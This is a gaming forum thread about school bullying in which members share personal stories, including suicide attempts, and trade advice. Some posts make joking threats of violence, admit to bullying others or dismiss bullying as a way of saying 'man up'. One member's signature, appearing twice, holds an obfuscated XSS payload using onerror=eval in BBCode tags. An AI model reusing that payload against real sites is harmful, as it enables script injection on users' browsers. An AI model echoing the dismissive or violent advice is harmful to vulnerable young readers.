Login to ZARP
Username: Password: Remember me

TOPIC: Bullying #StopThis!

Bullying #StopThis! 9 years 5 months ago #78358

Im not saying his not lying but.

Some people do find comfort in playing video games such as zarp whenever they are down.

And in some countrys, the police doesnt do shit about anything, depends on where you live.

If this is really the case, then im sorry for your loss, and i would suggest that you find another school since noone deserves to be threated like this, good luck!
  • Gems
  • Senior Boarder
  • ZARP VIP
  • Thanks received: 504
Last Edit: 9 years 5 months ago by Gems.
Login or register to post a reply.

Bullying #StopThis! 9 years 5 months ago #78363

TheMusicCat wrote:
1 in 4 teachers see nothing wrong with bullying and will only intervene 4% of the time.
That would be nice...
On my school the majority of teachers just ignore bullying/harrasment.
  • Harridas
  • Senior Boarder
  • ZARP VIP
  • The only Harridas on Steam
  • Thanks received: 127
Former Deathrun SuperAdministrator
Former TTT SuperAdministrator
Warning: Spoiler! [ Click to expand ]
Last Edit: 9 years 5 months ago by Harridas.

Bullying #StopThis! 9 years 5 months ago #78366

TheMusicCat wrote:
Im a very social guy and money doesnt make you happy... atleast not after my girlfriend commited suicide...
TheMusicCat wrote:
and my girlfriend well.. she commited suicide
TheMusicCat wrote:
I DIDNT WANT TO TALK ABOUT IT OK! Jesus.... i have a personal life

• Viking
  • Senior Boarder
  • ZARP VIP Golden Blue Badge
  • FP Ambassador™
  • Thanks received: 616
"Tbh you would have been a cm by now if you hadn’t got banned." - EMP 5/10/18
Last Edit: 9 years 5 months ago by Viking.
The following user(s) said Thank You: Chris

Bullying #StopThis! 9 years 5 months ago #78379

Here is what I'll say about this. It's a controversial opinion.
Deal with it. I get bullied all the time, IDGAF. If they piss me off too much I'll break their neck with a chair.
I myself bully people quite a bit in online communities, even though we like to call it trolling.
  • kristofferson
  • Gold Boarder
  • ZARP VIP
  • 420 Blaz It Son
  • Thanks received: 627
I'm EMP's only friend
"Do you have to wear lip stick" - RedPowder 2016
Unable to display Google Map.
[spoiler=throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13]]'throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13][/spoiler][quote=throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13]][code=throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]...

Bullying #StopThis! 9 years 5 months ago #78394

soxey6 wrote:
Here is what I'll say about this. It's a controversial opinion.
Deal with it. I get bullied all the time, IDGAF. If they piss me off too much I'll break their neck with a chair.
I myself bully people quite a bit in online communities, even though we like to call it trolling.
soxey6 A.K.A Australian Dragon have bullied me to :)
I'll break their neck with a chair.
in gmod ? "PROPLIMIT REACHED" oh no not agiain
  • William [!Paco2]
  • Senior Boarder
  • ZARP VIP
  • Peace never comes when war has begun
  • Thanks received: 29
Last Edit: 9 years 5 months ago by William [!Paco2].

Bullying #StopThis! 9 years 5 months ago #78419

I just found something (irrelevant) on imgur that might be able to cheer you up a bit.
http://imgur.com/gallery/VlLqJ
  • Harridas
  • Senior Boarder
  • ZARP VIP

Bullying #StopThis! 9 years 5 months ago #78465

Evilstewie wrote:
I was bullied non stop for 6years starting from year 3 to year 7,
its started simple as teachers pet and mostly about being *bigger* than other kids this was from year 3 till bout 5
Then from there I was called stuff I didn't really understand at the time as I was so too my self and didn't ask anything I didn't know what the insults were but I could get that they were one of them that I know now was ginger pubes.... at the time I hadn't a flipping clue so I just laughed this was from year 5-6.

Then came year 7 oh dear worst 3-4 months of my life I hated it so much. it started off just being called fat and stuff but then went onto being decked and stuff thrown at me, one time when going into maths I was pushed down a bunch of stairs and then was asked why I was late.... so after about a month or so of all of this is told my head of year she said we will monitor this bully.... F*** all happened to him, also I little side note this bully found it funny to squeezes boys butts as a *joke* so one time in DT he did it too me and it made me jump as I was sawing wood and I said dude what the hell why did you just squeeze my butt I WAS ONE TO ME TOLD OFF!
so now its about 3months into it and there was gona be a day off coz of a gas leak I was so happy to get a day off from it, then we found it was gona be ok :( I cried and cried and cried till my mum asked whats the problem so I explained it all, then after that she said that's it were going in so she kept me home till about 11 then we went into the school. after about a hour talking to my head of year she said well this stuff happens and you need to man up.....
on wards from there I had the same stuff for the next few days then it was the weekend.
the next Monday my mum picked me up and said thats your last Monday there, I didnt understand she explained I was going to be home educated so I have been home educated for wow nearly 3 years im I couldn't be happier,

just wanted to share my experience and that I %100 support you TheMusicCat in saying stop bullying :D
Holy crap, Evil's back!

And do your parents know about the bullying Music.
  • The Gamer Guy
  • Diamond Boarder
  • ZARP VIP
  • Thanks received: 749

SSRP - Ex-Super Admin
Minecraft - Ex-Admin
TeamSpeak - Ex-Staff

Bullying #StopThis! 9 years 5 months ago #78485

This might sound harsh but the only way not to get bullied is not to let it happen in the first place. Bullies pray on the weak and its a natural thing for people to do it goes back to cave men showing who is the dominant one.

My story: I was pretty young when I moved to the U.S. I had a lazy eye I was fat and had a accent. What more could you need to bully someone? Well in my case I never let it happen from the start only one person ever tried saying something to me and I humiliated them. It went like this "Hey mike can you see your Di*k and i replied with yes I'd see it a lot more if your mom would get off it" anyways that was he first and last time anyone wanted to mess because they knew I could give it out just as good as they could, after a couple years in school I became the "popular" one but I was different I didn't bully the kids that was weak or easy targets I would be the one that would tell that kid sitting at the back of the class by himself to come join us or if I'd see someone getting picked on is always help the kid that was the loner. The moral of they story is that no matter what you look like or how smart you are bullies will leave you alone if they know you won't take it and now look at me I'm damn near perfect haha

Sorry to hear about your girlfriend R.i.P

Ps: it's never not cool to give someone a friendly wave or ask someone how their day is. You never know it might be them couple words that might bring some sick to thinking straight.
  • RedPowder
  • Former Owner
  • Thanks received: 3318
Last Edit: 9 years 5 months ago by RedPowder.

Bullying #StopThis! 9 years 5 months ago #78486

Bullying is society's way of saying MAN UP.
Finally someone I can agree with! RedPowder you're my new friend :)
  • Studio Banter
  • Marvelous Boarder
  • ZARP VIP
  • ❤️
  • Thanks received: 5848

Bullying #StopThis! 9 years 5 months ago #78501

I got bullied too you know what i did? they didnt assault me i assaulted them :woohoo: i had fights every week when i was around 10-12 years old just kept fighting and here is the funny part if i was alone with them it was just fun if they were in a group i got bullied i have also tried to kill myself in different ways, doesnt work out for me i tried my own suicide's because im too scared to jump off a building or jump in front of a train but i kept up with it and look where i am right now. Many good friends a good life and a nice community to chill me down :D so being bullied is shitty but just keep up with it because if you get around drinking age you get enough friends :)
  • Daiki Aomine
  • Expert Boarder
  • ZARP VIP
  • The zone
  • Thanks received: 129

Bullying #StopThis! 9 years 5 months ago #78508

BuzzM4H wrote:
I got bullied too you know what i did? they didnt assault me i assaulted them :woohoo: i had fights every week when i was around 10-12 years old just kept fighting and here is the funny part if i was alone with them it was just fun if they were in a group i got bullied i have also tried to kill myself in different ways, doesnt work out for me i tried my own suicide's because im too scared to jump off a building or jump in front of a train but i kept up with it and look where i am right now. Many good friends a good life and a nice community to chill me down :D so being bullied is shitty but just keep up with it because if you get around drinking age you get enough friends :)

• Studio Banter
  • Marvelous Boarder
  • ZARP VIP
  • ❤️
  • Thanks received: 5848
The following user(s) said Thank You: Harridas

Bullying #StopThis! 9 years 5 months ago #78510

Stop going all smartass mode on him dont reply if you dont like him sharing his thoughts, brainless creatures.
  • Tyrone Shmurda
  • User is blocked
  • ZARP VIP
  • [b]i be workin de corner[/b]
  • Thanks received: 149

Bullying #StopThis! 9 years 5 months ago #78512

Here's my advice, if you have no chance either:

Try to be friendly with the bullies and help them up when they fall etc (That's a last resort)

Tell your parents how it's effecting your life, that it gives you bad thoughts that you might wanna do (If your parents ignore you, then go ask your cousin or a 15-17 year old friend you know to go talk to them or even tell teachers about them.)

Never try to fight back, cause they're gonna come back with more force at you.

I've been bullied alot, not once. I've been strangled, sat on, and always hit in school. But after I was 11 no one wanted to fuck with me cause at that time I had lots of friends to back me up. Anyway, they tried to bully me again when I was 11, but they couldn't I was #2Strong4Them.

Good luck man, btw, don't be afraid to tell your parents. They made you, they're here for you man..
  • Christopher S
  • Expert Boarder
  • ZARP VIP
  • "Anyone?"
  • Thanks received: 211
The following user(s) said Thank You: The Gamer Guy, Harridas

Bullying #StopThis! 9 years 5 months ago #78518

I just remembered, about 3 or 4 years ago beat one of the bullies and after that I don't remember ever getting bullied again :side:
  • Harridas
  • Senior Boarder
  • ZARP VIP

Bullying #StopThis! 9 years 5 months ago #78539

soxey6 wrote:
I get bullied all the time, IDGAF. If they piss me off too much I'll break their neck with a chair.
I myself bully people quite a bit
  • Viking
  • Senior Boarder
  • FP Ambassador™
  • Thanks received: 616
"Tbh you would have been a cm by now if you hadn’t got banned." - EMP 5/10/18
The following user(s) said Thank You: Studio Banter

Bullying #StopThis! 9 years 5 months ago #78597

Commander Viking wrote:
soxey6 wrote:
I get bullied all the time, IDGAF. If they piss me off too much I'll break their neck with a chair.

Great, oh there's a bully 1 sec. MOOOOM GET DEM CHAIRS, k son. Thx mommy
  • Christopher S
  • Expert Boarder
  • ZARP VIP
  • "Anyone?"
  • Thanks received: 211

Bullying #StopThis! 9 years 5 months ago #78630

Chris_Smith wrote:
Commander Viking wrote:
soxey6 wrote:

Great, oh there's a bully 1 sec. MOOOOM GET DEM CHAIRS, k son. Thx mommy

Lol
  • William [!Paco2]
  • Senior Boarder
  • ZARP VIP
  • Peace never comes when war has begun
  • Thanks received: 29

Bullying #StopThis! 9 years 5 months ago #78636

!Paco2 wrote:
soxey6 A.K.A Australian Dragon have bullied me to :)
I'll break their neck with a chair.
in gmod ? "PROPLIMIT REACHED" oh no not agiain
Coming from the person who started disrespected 2 members of staff by swearing that them, I would also point out I only do this in game when the users are obvious trolls and I did not do it to you. I did bully the kid spamming sonic out of his speakers while using speed hacks though (I question his life choices if this is the best he can do at 3AM).
  • kristofferson
  • Gold Boarder
  • ZARP VIP
  • 420 Blaz It Son
I'm EMP's only friend
[spoiler=throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13]]'throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13][/spoiler][quote=throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13]][code=throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]...

Bullying #StopThis! 9 years 5 months ago #78637

Commander Viking wrote:
soxey6 wrote:
UR A BULLY, REPORTED TO CHRIS
  • kristofferson
  • Gold Boarder
  • ZARP VIP
  • 420 Blaz It Son
I'm EMP's only friend

Bullying #StopThis! 9 years 5 months ago #78646

To be honest, i can't believe what some people think, but alright.
People bully you because they're assholes who want to look cool in school. If it really annoys you you can do something against it. Talk to Parents/teacher OR try to fight back. Don't let these dumbasses think that they are something better than you are.
  • TheAp4ch3
  • Diamond Boarder
  • ZARP VIP
  • Making ZARP great since 2013
  • Thanks received: 805
GET SOME RIDICULOUSLY CHEAP GAMES AT www.g2a.com/r/user-55e1e47e829e4
Time to create page: 0.161 seconds

294 PLAYERS ONLINE

Connect to server View Gametracker DarkRP 1
11/127
Connect to server View Gametracker Deathrun